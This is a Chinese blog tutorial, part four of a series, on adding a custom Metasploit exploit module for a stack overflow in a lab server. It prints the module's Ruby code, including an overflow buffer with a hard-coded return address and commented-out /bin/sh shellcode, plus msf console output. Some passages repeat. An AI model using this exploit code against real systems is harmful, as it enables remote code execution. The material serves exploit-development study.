使用metasploit进行栈溢出攻击-4
2014-11-22 10:23
253 查看
有了漏洞我们就可以进行攻击了。首先我们需要了解metasploit的exploit模块,具体可以看
http://www.offensive-security.com/metasploit-unleashed/Exploit_Development
metasploit本身功能非常强大,这里不多做介绍。
首先我们需要添加一个针对这个漏洞的exploit模块,
我们直接在样例上进行修改:
然后查看myvictim.rb
然后我们需要把他添加进metasploit,运行reload_all
=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 719 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13462 updated 1208 days ago (2011.08.01)
Warning: This copy of the Metasploit Framework was last updated 1208 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see: https://community.rapid7.com/docs/DOC-1306
msf > reload_all
msf > use exploit/linux/my
use exploit/linux/mysql/mysql_yassl_getname use exploit/linux/myvictimserver
use exploit/linux/mysql/mysql_yassl_hello
msf > use exploit/linux/my
这里并没有列出来我们刚刚添加的模块,说明模块有问题,必须修改,修改如下:
这时候,我们就可以找到这个模块了。
http://www.offensive-security.com/metasploit-unleashed/Exploit_Development
metasploit本身功能非常强大,这里不多做介绍。
首先我们需要添加一个针对这个漏洞的exploit模块,
我们直接在样例上进行修改:
root@bt:~/.msf4/modules# mkdir exploits root@bt:~/.msf4/modules# cd exploits root@bt:~/.msf4/modules/exploits# mkdir linux root@bt:~/.msf4/modules/exploits/linux# cp /pentest/exploits/framework/documentation/samples/modules/exploits/sample.rb myvictim.rb root@bt:~/.msf4/modules/exploits/linux# ls myvictim.rb myvictimserver.rb proftp_sreplace.rb
然后查看myvictim.rb
## # $Id: sample.rb 9212 2010-05-03 17:13:09Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' module Msf ### # # This exploit sample shows how an exploit module could be written to exploit # a bug in an arbitrary TCP server. # ### class Exploits::Sample < Msf::Exploit::Remote # # This exploit affects TCP servers, so we use the TCP client mixin. # include Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Sample exploit', 'Description' => %q{ This exploit module illustrates how a vu lnerability could be exploited in an TCP server that has a parsing bug. }, 'Author' => 'skape', 'Version' => '$Revision: 9212 $', 'References' => [ ], 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00", }, 'Targets' => [ # Target 0: Windows All [ 'Windows Universal', { 'Platform' => 'win', 'Ret' => 0x41424344 } ], ], 'DefaultTarget' => 0)) end # # The sample exploit just indicates that the remote host is always # vulnerable. # def check return Exploit::CheckCode::Vulnerable end # # The exploit method connects to the remote service and sends 1024 A's # followed by the fake return address and then the payload. # def exploit connect print_status("Sending #{payload.encoded.length} byte payload..." ) # Build the buffer for transmission buf = "A" * 1024 buf += [ target.ret ].pack('V') buf += payload.encoded # Send it off sock.put(buf) sock.get handler end end end
然后我们需要把他添加进metasploit,运行reload_all
=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 719 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13462 updated 1208 days ago (2011.08.01)
Warning: This copy of the Metasploit Framework was last updated 1208 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see: https://community.rapid7.com/docs/DOC-1306
msf > reload_all
msf > use exploit/linux/my
use exploit/linux/mysql/mysql_yassl_getname use exploit/linux/myvictimserver
use exploit/linux/mysql/mysql_yassl_hello
msf > use exploit/linux/my
这里并没有列出来我们刚刚添加的模块,说明模块有问题,必须修改,修改如下:
## # $Id: myvictimserver.rb 9212 2014-11-03 17:13:09Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' ### # # This exploit sample shows how an exploit module could be written to exploit # a bug in an arbitrary TCP server. # ### class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # # This exploit affects TCP servers, so we use the TCP client mixin. # include Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'MyVictimSever', 'Description' => %q{ This exploit module illustrates how a vulnerability could be exploited in an TCP server that has a stackoverflow bug. }, 'Author' => 'bai', 'Version' => '$Revision: 9212 $', 'References' => [ ], 'Payload' => { 'Space' => 116, # 'BadChars' => "\x00", }, 'Targets' => [ # Target 0: Windows All [ 'MyVictimSever run on linux', { 'Platform' => 'Linux', 'Ret' => 0xbffff4a4 } ], ], 'DefaultTarget' => 0)) end # # The sample exploit just indicates that the remote host is always # vulnerable. # def check return Exploit::CheckCode::Vulnerable end # # The exploit method connects to the remote service and sends 1024 A's # followed by the fake return address and then the payload. # def exploit connect print_status("Sending #{payload.encoded.length} byte payload...") # Build the buffer for transmission buf=""; #buf = "\x90" * 15 #buf+="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" #buf+="\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" #buf+="\x80\xe8\xdc\xff\xff\xff/bin/sh"; buf+="\xa4\xf4\xff\xbf" buf += payload.encoded buf += [].fill( target.ret,0,100).pack('V*') # Send it off sock.put(buf) sock.get handler end end
这时候,我们就可以找到这个模块了。
msf > use exploit/linux/my use exploit/linux/mysql/mysql_yassl_getname use exploit/linux/myvictim use exploit/linux/mysql/mysql_yassl_hello use exploit/linux/myvictimserver msf > use exploit/linux/my
相关文章推荐
- 使用metasploit进行栈溢出攻击-3
- 使用metasploit进行栈溢出攻击-5
- 使用metasploit进行栈溢出攻击-2
- 使用metasploit进行栈溢出攻击-1
- 使用MetaSploit在WinXP对Win2000进行攻击
- Linux使用ROP进行栈溢出攻击
- 使用metasploit进行渗透攻击步骤
- 使用metasploit-framework进行主机发现和端口扫描
- 使用 OpenSSL API 进行安全编程,第 2 部分: 安全握手--防止中间人(MITM)攻击
- MySQL数据库遭到攻击篡改(使用备份和binlog进行数据恢复)
- Metasploit使用问题记录及攻击测试代码
- Kali Linux进行内网攻击--》使用arpspoof
- Ubuntu10.04下使用metasploit对win2000 server进行MS06-040溢出
- 使用 OpenSSL API 进行安全编程,第 2 部分: 安全握手 防止中间人(MITM)攻击
- 内网中使用metasploit进行渗透测试
- 使用Metasploit进行端口扫描
- Ubuntu10.04下使用metasploit对win2000 server进行MS08-067溢出
- 使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程